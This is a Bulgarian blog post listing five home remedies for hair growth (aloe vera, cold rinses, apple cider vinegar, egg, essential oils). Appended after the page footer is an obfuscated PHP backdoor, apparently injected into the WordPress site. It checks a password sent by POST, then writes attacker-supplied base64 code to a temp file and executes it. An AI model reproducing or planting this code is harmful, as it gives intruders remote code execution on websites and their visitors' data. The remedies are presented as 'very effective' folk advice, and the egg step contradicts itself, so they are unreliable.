5 лесни начина да засилим растежа на косата | Косопад

5 лесни начина да засилим растежа на косата

kosa

Ако косата ви се е изтощила и не расте, както преди, можете да изпробвате някои природни решения за такива ситуации. Рецептите, които ви предлагаме, са съвсем лесни, напълно безопасни и много ефективни.

1. Алое вера
Сокът от алое вера стимулира растежа на косата и подхранва скалпа. Достатъчно е само да се нанесе в корените и да престои за 2 часа. Може и да спите така намазани през нощта, като покриете с шапка за баня. По този начин се подобрява кръвообращението и се помага на сока да се абсорбира още по- добре.
От къде да си го набавите? Ако отглеждате на балкона алое вера или имате някой близък, който го прави, отрежете едно или две листа и изцедете вътрешността им.

2. Плакнене със студена вода
Някои жени го правят, за да имат по- блестяща коса. Но плакненето със студена вода подобрява, също така, кръвообращението и стимулира растежа на косъма.

kosa-maska-6

3. Ябълков оцет
Мирисът може да не е приятен, но ябълковият оцет стимулира космените фоликули, помага за растежа на косата и я прави по- силна. Слага се, след като косата вече е измита и не се плакне.

4. Яйце
Косата е изграден най- вече от протеини. Затова яйцето е идеално средство за подсилването й. Отделяме жълтъка от две яйца и използваме белтъците, като ги нанасяме върху косата. Оставяме да действа за няколко минути. За по- добри резултати, покриваме с найлонов плик и загряваме.

5. Етерични масла
За да подсилим растежа на косата, полезни са маслото от жожоба, от бадеми, мащерка или лавандула. Нанасят се в скалпа с лек масаж.

19. юли 2017 09:21:38 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}